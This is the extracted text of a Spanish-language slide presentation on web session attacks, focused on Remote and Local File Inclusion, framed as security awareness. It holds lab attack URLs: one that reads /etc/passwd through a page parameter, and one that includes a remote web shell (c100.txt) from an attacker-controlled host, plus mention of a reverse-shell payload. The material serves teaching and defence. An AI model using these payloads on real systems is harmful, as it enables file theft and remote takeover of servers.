Documente Academic
Documente Profesional
Documente Cultură
Omar Palomino
omarc320@gmail.com Twitter: @ELPalomo_Blog
http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion
Ing. Sistemas y Maestrista de Ing. de Computacin y Sistemas, CEH, Security+, ITIL v3. Consultor en seguridad de informacin. Psiclogo que aun no comienza sus estudios. Escritor en mis tiempos libres: http://www.el-palomo.com
http://www.facebook.com/El.Palomo.Seguridad.Informacion
http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion
Conclusiones y contramedidas
Las tcnicas mostradas en la presentacin tienen por objetivo CONOCER las tcnicas utilizadas por los hackers para robar y secuestrar sesiones de aplicaciones web. La presentacin NO TIENE POR OBJETIVO ensear tcnicas para realizar ataques contra aplicaciones web que son penados segn la legislacin de cada pas. El autor no se hace responsable del mal uso de las tcnicas mostradas en la presentacin.
http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion
Conclusiones y contramedidas
Descripcin
RFI: Remote File Inclusion permite aadir scripts o archivos remotos en el servidor vulnerable. LFI: Local File Inclusion permite obtener archivos locales almacenados en el servidor. RFI nos permitir subir archivos al servidor vulnerable (*) RFI nos permitir realizar una conexin reversa a travs de un PAYLOAD
http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion
Conclusiones y contramedidas
Descripcin
http://192.168.1.44/fileinclusion/main.php?page=/etc/passwd
http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion
Conclusiones y contramedidas
Funcionamiento (RFI)
http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion
Conclusiones y contramedidas
Funcionamiento
1.- El servidor WEB controlado por el HACKER contiene un script que nos permite realizar un UPLOAD de archivos. 2.- Aqu podemos realizar la carga de muchos archivos remotos.
http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion
Conclusiones y contramedidas
http://192.168.1.44/fileinclusion/main.php?page=http://192.168.1.48/hacking/c100.txt
Conclusiones y contramedidas
Funcionamiento
1.- Creamos un PAYLOAD de conexin reversa para cargarla al servidor vulnerable.
http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion
Conclusiones y contramedidas
http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion
Conclusiones y contramedidas
Inclusin de archivos pasados por el mtodo GET como pgina web, el mismo representa una vulnerabilidad.
http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion
Conclusiones y contramedidas
http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion
Omar Palomino
omarc320@gmail.com Twitter: @ELPalomo_Blog
http://www.el-palomo.com http://www.facebook.com/El.Palomo.Seguridad.Informacion